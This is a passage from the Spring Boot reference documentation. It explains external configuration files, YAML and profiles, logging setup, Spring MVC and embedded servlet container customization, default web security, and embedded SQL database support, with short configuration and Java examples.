configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: if you use environment variables not system properties, most operating systems\ndisallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profiles specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create ``short'' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use ``starter POMs'' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nby using a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, If you use the ``Starter POMs'', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing, generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millesecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using ``logging.level.*=LEVEL''\nwhere ``LEVEL'' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are know classloading issues with Java Util Logging that cause problems\nwhen running from an ``executable jar''. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The ``Spring Web MVC framework''\nThe Spring Web MVC framework (often referred to as simply ``Spring MVC'') is a rich\n``model view controller'' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodeResolver` (see below)\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the ``standard'' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `\/webjars\/**` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your templates\nwill be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a ``global'' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a ``whitelabel'' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to ``error''). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n container.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-exception-handlers[`@ExceptionHandler`\nmethods] and http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-ann-controller-advice[`@ControllerAdvice`].\nThe `ErrorController` will then pick up any unhandled exceptions.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate ``Starter POM'' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlets beans the bean name will be used as a path prefix. Filters\nwill map to `\/*`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.404, \"\/notfound.html\");\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n``hooks'' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith ``basic'' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user (``user'' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`\/css\/**`, `\/js\/**`,\n `\/images\/**` and `**\/favicon.ico`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`security.*`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`management.security.*`). To override the application access rules\nadd a `@Bean` of type `WebConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete ``object relational mapping''\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The ``How-to'' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== 